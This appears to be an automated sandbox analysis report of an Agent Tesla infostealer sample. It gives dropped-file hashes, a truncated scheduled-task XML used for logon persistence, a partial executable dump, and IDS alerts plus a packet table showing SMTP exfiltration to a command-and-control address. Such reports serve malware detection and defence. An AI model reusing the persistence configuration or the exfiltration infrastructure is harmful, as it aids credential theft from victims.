                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1580
                                                Entropy (8bit):5.116484496204205
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTcv
                                                MD5:1AC293B57893D7F15FEC2D62F2B81B15
                                                SHA1:7D73A01CDEBDC72F08EF5001BE928CADFAE17FF7
                                                SHA-256:7F4C202C63938CB22EED8ABDC026F2AE89379086669AFCE07C713A74331736C8
                                                SHA-512:92BF0B98B56A2C92C493F33CD6478901E25E78411AE816D941467F30139941ABD96DFA3D7787580BD445ACEC7679F4DF09341F8DB3ED183A7FA9AF3FBF9F5B2E
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                Process:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1580
                                                Entropy (8bit):5.116484496204205
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTcv
                                                MD5:1AC293B57893D7F15FEC2D62F2B81B15
                                                SHA1:7D73A01CDEBDC72F08EF5001BE928CADFAE17FF7
                                                SHA-256:7F4C202C63938CB22EED8ABDC026F2AE89379086669AFCE07C713A74331736C8
                                                SHA-512:92BF0B98B56A2C92C493F33CD6478901E25E78411AE816D941467F30139941ABD96DFA3D7787580BD445ACEC7679F4DF09341F8DB3ED183A7FA9AF3FBF9F5B2E
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):685063
                                                Entropy (8bit):7.60396683966757
                                                Encrypted:false
                                                SSDEEP:12288:RkXayww0J7RG6YnakFrTtJ7IomjXXIR+w8/6ODi6dU3bAil+8I4:WajBtN+aOrTtJ7IZ4EwQh1d9iot
                                                MD5:2C10CB6C2E23B7712EBF4042D669CD09
                                                SHA1:F86ADB59BD065AFD9195B9375271096F341842DC
                                                SHA-256:546569A42F00553D7FDA79E6961779AFADD95EA8E6A8738EF344275F2B642244
                                                SHA-512:2AC43799B1C4169308CCAB675563897BC6D3A144EBDE4FD214D4BCE114A978576A5980CEC8909A37B12C912B86297645CC79F8E9BB0C21EA4ECDA409E3492ABA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0..j..........f.... ........@.. ....................................@.....................................O....................................q..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............r..............@..B................F.......H.......|e...C..........`...(............................................0.............?......?...%.n...(.......?...%.r...(.......?...%.p...(.......?...%.o...(........?...%.q...(...............r...p(....-:..r...p(....-5..r...p(....-0..r...p(....-+..r...p(....-'+/.(...+.+&.(...+.+..(...+.+...(...+.+...(...+.+....+...*...0..,.......sg......}s........h...s....(...+..(...+.+..*.0..{........~)...o....}.....~*...}...........}.......?...}......}......}.....(.......(......(......(...
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.60396683966757
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:LisectAVT_2403002A_16.exe
                                                File size:685'063 bytes
                                                MD5:2c10cb6c2e23b7712ebf4042d669cd09
                                                SHA1:f86adb59bd065afd9195b9375271096f341842dc
                                                SHA256:546569a42f00553d7fda79e6961779afadd95ea8e6a8738ef344275f2b642244
                                                SHA512:2ac43799b1c4169308ccab675563897bc6d3a144ebde4fd214d4bce114a978576a5980cec8909a37b12c912b86297645cc79f8e9bb0c21ea4ecda409e3492aba
                                                SSDEEP:12288:RkXayww0J7RG6YnakFrTtJ7IomjXXIR+w8/6ODi6dU3bAil+8I4:WajBtN+aOrTtJ7IZ4EwQh1d9iot
                                                TLSH:0AE412B2124D6725E6A827F5424AD17243B14D978464C24C8FCABCCF7979F80C61AEBF
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0..j..........f.... ........@.. ....................................@................................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x4a8966
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xFEADA566 [Tue May 26 14:55:34 2105 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                inc ecx
                                                add cl, al
                                                add bl, al
                                                add dl, al
                                                add al, al
                                                add ah, al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [edi+00h], cl
                                                rol dword ptr [eax], cl
                                                aad 00h
                                                aam 00h
                                                rol byte ptr [eax], cl
                                                salc
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx+00h], cl
                                                int 00h
                                                into
                                                add ah, cl
                                                add bh, cl
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ebp+00h], dl
                                                fiadd dword ptr [eax]
                                                fild dword ptr [eax]
                                                fld dword ptr [eax]
                                                fadd qword ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                inc ebp
                                                add cl, cl
                                                add dl, cl
                                                add al, cl
                                                add bl, cl
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa8912 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x5ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa7188 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa69bc | 0xa6a00 | 29c64714f527c3485fff68ff7c6bdb09 | False | 0.8639098251125281 | data | 7.613224313381159 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xaa000 | 0x5ac | 0x600 | d0ad6e480a7c708cd40aef5d151ab94f | False | 0.423828125 | data | 4.101457314667063 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xac000 | 0xc | 0x200 | 4ece1db0d5e59280e03abec53da7b154 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xaa090 | 0x31c | data | - | - | 0.4371859296482412
RT_MANIFEST | 0xaa3bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T23:35:36.103588+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49737 | 40.68.123.157 | 192.168.2.4
2024-07-25T23:35:25.918768+0200 | TCP | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 49735 | 587 | 192.168.2.4 | 199.79.62.115
2024-07-25T23:35:29.982176+0200 | TCP | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 49736 | 587 | 192.168.2.4 | 199.79.62.115
2024-07-25T23:35:55.569991+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 53201 | 52.165.165.26 | 192.168.2.4
2024-07-25T23:35:56.837685+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 53202 | 52.165.165.26 | 192.168.2.4
2024-07-25T23:35:11.625146+0200 | TCP | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49736 | 587 | 192.168.2.4 | 199.79.62.115

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 23:35:23.876939058 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:23.885090113 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:23.885191917 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:24.793643951 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:24.794495106 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:24.794589043 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:24.794698000 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:24.799479961 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:24.949985027 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:24.950963974 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:24.957315922 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.107184887 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.107641935 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.112927914 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.390507936 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.405983925 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.410924911 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.560883045 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.563057899 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.568017006 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.735280037 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.740468979 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.745935917 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.903961897 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.918486118 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.918767929 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.918808937 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.918808937 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:25.923645020 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.923719883 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.923729897 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:25.924105883 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:26.176848888 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:26.249310017 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:28.116808891 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:28.121876955 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:28.121990919 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:28.767617941 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:28.768058062 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:28.773082972 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:28.989729881 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.050421000 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.056140900 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.211951971 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.225052118 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.230014086 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.386955023 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.437552929 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.444000959 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.599245071 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.600358963 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.605863094 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.816788912 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.819538116 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.830068111 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.981301069 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.982088089 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.982176065 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.982202053 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.982223034 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:35:29.987366915 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.987396955 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.987410069 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:29.987416983 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:30.144319057 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:30.365951061 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:35:30.366024017 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:37:03.532053947 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:37:03.538991928 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:37:03.890084028 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:37:03.890256882 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:37:03.890357971 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:37:03.890574932 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:37:03.895457029 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:37:08.235577106 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:37:08.240905046 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:37:08.598304033 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:37:08.598356962 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4
Jul 25, 2024 23:37:08.598412991 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
Jul 25, 2024 23:37:08.598515034 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115
